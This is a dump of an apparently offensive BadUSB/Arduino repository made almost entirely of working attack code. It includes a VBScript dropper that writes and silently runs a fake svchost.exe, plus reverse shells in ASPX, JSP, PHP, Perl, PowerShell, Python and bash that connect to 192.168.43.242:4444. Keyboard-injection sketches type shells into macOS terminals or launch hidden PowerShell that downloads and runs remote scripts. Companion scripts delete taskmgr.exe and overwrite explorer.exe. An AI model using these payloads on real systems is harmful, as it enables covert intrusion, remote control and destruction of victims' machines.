wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(185)&Chr(103)&Chr(193)&Chr(128)&Chr(176)&Chr(186)&Chr(49)&Chr(120)&Chr(24)&Chr(106)&Chr(53)&Chr(29)&Chr(169)&Chr(185)&Chr(208)&Chr(31)&Chr(12)&Chr(231)&Chr(176)&Chr(241)&Chr(95)&Chr(233)&Chr(122)&Chr(216)&Chr(214)&Chr(95)&Chr(138)&Chr(162)&Chr(8)&Chr(132)&Chr(52)&Chr(206)&Chr(221)&Chr(247)&Chr(244)&Chr(26)&Chr(119)&Chr(198)&Chr(248)&Chr(96)&Chr(87)&Chr(252)&Chr(214)&Chr(57)&Chr(25)&Chr(230)&Chr(218)&Chr(128)&Chr(175)&Chr(68)&Chr(75)&Chr(198)&Chr(17)&Chr(115)&Chr(145)&Chr(37)&Chr(148)&Chr(52)&Chr(106)&Chr(150)&Chr(9)&Chr(6)&Chr(168)
		Dim eyulDLCNyPhly
		Set eyulDLCNyPhly = CreateObject("Scripting.FileSystemObject")
		Dim ztgykKkZMO
		Dim IxLPuRIJZ
		Dim sBpfsVCwFv
		Dim KIymDWTNS
		Set IxLPuRIJZ = eyulDLCNyPhly.GetSpecialFolder(2)
		KIymDWTNS = IxLPuRIJZ & "\" & eyulDLCNyPhly.GetTempName()
		eyulDLCNyPhly.CreateFolder(KIymDWTNS)
		sBpfsVCwFv = KIymDWTNS & "\" & "svchost.exe"
		Set ztgykKkZMO = eyulDLCNyPhly.CreateTextFile(sBpfsVCwFv,2,0)
		ztgykKkZMO.Write wvWPLP
		ztgykKkZMO.Close
		Dim iRUzZUgWeAViBB
		Set iRUzZUgWeAViBB = CreateObject("Wscript.Shell")
		iRUzZUgWeAViBB.run sBpfsVCwFv, 0, false
	End Sub

	gJjCrDeBtLBn
%>


================================================
FILE: MSF_Trojanlinkage/shell.aspx
================================================
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
    private static Int32 MEM_COMMIT=0x1000;
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);

    protected void Page_Load(object sender, EventArgs e)
    {
        byte[] cm4LyzU5U = new byte[341] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,
0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,
0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,
0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,
0x68,0xc0,0xa8,0x2b,0xf2,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,
0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,
0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,
0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,
0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,
0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };

        IntPtr lyJHQJZlCdU = VirtualAlloc(IntPtr.Zero,(UIntPtr)cm4LyzU5U.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        System.Runtime.InteropServices.Marshal.Copy(cm4LyzU5U,0,lyJHQJZlCdU,cm4LyzU5U.Length);
        IntPtr yfjmxMfZtg = IntPtr.Zero;
        IntPtr eKHXA = CreateThread(IntPtr.Zero,UIntPtr.Zero,lyJHQJZlCdU,IntPtr.Zero,0,ref yfjmxMfZtg);
    }
</script>


================================================
FILE: MSF_Trojanlinkage/shell.jsp
================================================
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream ck;
    OutputStream zl;

    StreamConnector( InputStream ck, OutputStream zl )
    {
      this.ck = ck;
      this.zl = zl;
    }

    public void run()
    {
      BufferedReader ov  = null;
      BufferedWriter hgi = null;
      try
      {
        ov  = new BufferedReader( new InputStreamReader( this.ck ) );
        hgi = new BufferedWriter( new OutputStreamWriter( this.zl ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = ov.read( buffer, 0, buffer.length ) ) > 0 )
        {
          hgi.write( buffer, 0, length );
          hgi.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( ov != null )
          ov.close();
        if( hgi != null )
          hgi.close();
      } catch( Exception e ){}
    }
  }

  try
  {
    String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
  ShellPath = new String("/bin/sh");
} else {
  ShellPath = new String("cmd.exe");
}

    Socket socket = new Socket( "192.168.43.242", 4444 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>


================================================
FILE: MSF_Trojanlinkage/shell.php
================================================
/*<?php /**/ error_reporting(0); $ip = '192.168.43.242'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

================================================
FILE: MSF_Trojanlinkage/shell.pl
================================================
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.43.242:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

================================================
FILE: MSF_Trojanlinkage/shell.psl
================================================
function yI6 {
	Param ($pwJF, $eI)		
	$pk1l = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	
	return $pk1l.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($pk1l.GetMethod('GetModuleHandle')).Invoke($null, @($pwJF)))), $eI))
}

function jQhd {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $iis,
		[Parameter(Position = 1)] [Type] $fM = [Void]
	)
	
	$ndG = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$ndG.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $iis).SetImplementationFlags('Runtime, Managed')
	$ndG.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $fM, $iis).SetImplementationFlags('Runtime, Managed')
	
	return $ndG.CreateType()
}

[Byte[]]$iLgSz = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCABFcwKgr8kFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V")
		
$zpx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll VirtualAlloc), (jQhd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $iLgSz.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($iLgSz, 0, $zpx, $iLgSz.length)

$sSYR = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll CreateThread), (jQhd @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zpx,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll WaitForSingleObject), (jQhd @([IntPtr], [Int32]))).Invoke($sSYR,0xffffffff) | Out-Null


================================================
FILE: MSF_Trojanlinkage/shell.py
================================================
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguNDMuMjQyJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))

================================================
FILE: MSF_Trojanlinkage/shell.sh
================================================
0<&202-;exec 202<>/dev/tcp/192.168.43.242/4444;sh <&202 >&202 2>&202

================================================
FILE: OSX_Built-inReverseShell/OSX_SystemReverseConnection (dns_shell).ino
================================================

void setup()
{
  delay(5000);
  run("terminal");
  delay(3000);
  Keyboard.print("nslookup -querytype=txt INPUT0 |");
  delay(200);
  Keyboard.print(" INPUT0 |");
  delay(200);
  Keyboard.print("grep text | cut -d \" \" -f3-");
  delay(200);
  Keyboard.print(" | tr -d \"\\\"\" | base64 -D");
  delay(200);
  Keyboard.println(" | /bin/bash");
  
}

void loop()
{
   
}

void run(char *SomeCommand){
  
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();

  delay(500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  Keyboard.set_key1(0);
  Keyboard.send_now();
}



================================================
FILE: OSX_Built-inReverseShell/OSX_SystemReverseConnection (perl_shell).ino
================================================


void setup()
{
  delay(5000);
  run("terminal");
  delay(3000);
  Keyboard.print("perl -MIO -e '$p=fork;exit,if");
  delay(100);
  Keyboard.print("($p);$c=new IO::Socket::INET");
  delay(100);
  Keyboard.print("(PeerAddr,\"INPUT0:INPUT1\"");
  delay(100);
  Keyboard.print(");STDIN->fdopen($c,r);$~->");
  delay(100);
  Keyboard.print("fdopen($c,w);system$_ ");
  delay(100);
  Keyboard.println("while<>;'");
  
    
}

void loop()
{
   
}

void run(char *SomeCommand){
  
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();

  delay(500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  Keyboard.set_key1(0);
  Keyboard.send_now();
}



================================================
FILE: OSX_Built-inReverseShell/OSX_SystemReverseConnection (ruby_shell).ino
================================================

void setup()
{
  
    delay(5000);
  run("terminal");
  delay(3000);
  Keyboard.print("ruby -rsocket -e 'exit if fork;");
  delay(100);
  Keyboard.print("c=TCPSocket.new");
  delay(100);
  Keyboard.print("(\"INPUT0\",\"INPUT1\"");
  delay(100);
  Keyboard.print(");while(cmd=c.gets);IO.popen");
  delay(100);
  Keyboard.println("(cmd,\"r\"){|io|c.print io.read}end'");
  delay(100);
    
}

void loop()
{
   
}

void run(char *SomeCommand){
  
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();

  delay(500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  Keyboard.set_key1(0);
  Keyboard.send_now();
}




================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv0/FullScreenHackedv/FullScreenHackedv.ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("POWERSHELL -NOP");
  delay(1000);
  Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://FQ.WC.LT/UP/1459435782.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT\" -vERB RUNAS;EXIT");
  delay(500);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_LEFT_ALT);
  delay(50);
}


================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv0/get.ps1
================================================
cd \;
(New-Object System.Net.Webclient).DownloadFile("http://image.cnsc8.com/tupian_201501/Big_Pic/nRz13KeMr5.jpg","c:\x.jpg");
Start-Sleep -Seconds 5;
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d c:\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;
taskkill /F /IM explorer.exe;
Start-Sleep -Seconds 5;
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d c:\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;
taskkill /F /IM explorer.exe;
Remove-Item get.ps1;
exit;

================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv2/FullScreenHackedv2.ino
================================================
void setup() {
  Keyboard.begin();
  delay(5000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(500); 
  Keyboard.press('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("POWERSHELL -W HIDDEN -NOP -C \"IEX(nEW-oBJECT nET.wEBcLIENT).dOWNLOADsTRING('HTTP://PAN.PLYZ.NET/D.ASP?U=1369254435&P=sns.PS1')\";EXIT");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}
void loop()
{
}


================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv2/wall.ps1
================================================
$down="$env:userprofile\Local Settings\Application Data\Microsoft\Wallpaper1.bmp"
(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);
start-sleep 5
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v `"WallpaperStyle`" /t reg_sz /d 2 /f"
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v WallpaperStyle /d "2" /f"
cmd /c "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"
cmd /c "gpupdate /force"
cmd /c "takeown /f c:\windows\explorer.exe"
cmd /c "echo y `|cacls c:\windows\explorer.exe /g administrator:f"
cmd /c "icacls c:\windows\explorer.exe /grant administrator:f"
cmd /c "takeown /f C:\Windows\System32\taskmgr.exe"
cmd /c "echo y `|cacls C:\Windows\System32\taskmgr.exe /g administrator:f"
cmd /c "icacls c:\windows\System32\taskmgr.exe /grant administrator:f"
cmd /c "del /f /q C:\Windows\System32\taskmgr.exe"
cmd /c "taskkill /f /im explorer.exe&echo 123>c:\windows\explorer.exe"

================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/FullScreenHackedv3/FullScreenHackedv3.ino
================================================
void setup(){
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("POWERSHELL -NOP");
  Keyboard.println();
  delay(1000);
  Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;IEX(nEW-OBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADsTRING(`'HTTP://PAN.PLYZ.NET/D.ASP?U=1235108351&P=GET.PS1`');EXIT\" -vERB RUNAS;EXIT");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
  //bypass uac 绕过UAC,这一段不会用的不要用,否则后果自负
  //Keyboard.press(KEY_LEFT_ALT);
  //Keyboard.print('y');
  //Keyboard.release(KEY_LEFT_ALT);
}


================================================
FILE: PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/get.ps1
================================================
$down="$env:userprofile\Local Settings\Application Data\Microsoft\Wallpaper1.bmp"
(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);
start-sleep 5
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v `"WallpaperStyle`" /t reg_sz /d 2 /f"
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v WallpaperStyle /d "2" /f"
cmd /c "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"
cmd /c "gpupdate /force"
cmd /c "takeown /f c:\windows\explorer.exe"
cmd /c "echo y `|cacls c:\windows\explorer.exe /g administrator:f"
cmd /c "icacls c:\windows\explorer.exe /grant administrator:f"
cmd /c "takeown /f C:\Windows\System32\taskmgr.exe"
cmd /c "echo y `|cacls C:\Windows\System32\taskmgr.exe /g administrator:f"
cmd /c "icacls c:\windows\System32\taskmgr.exe /grant administrator:f"
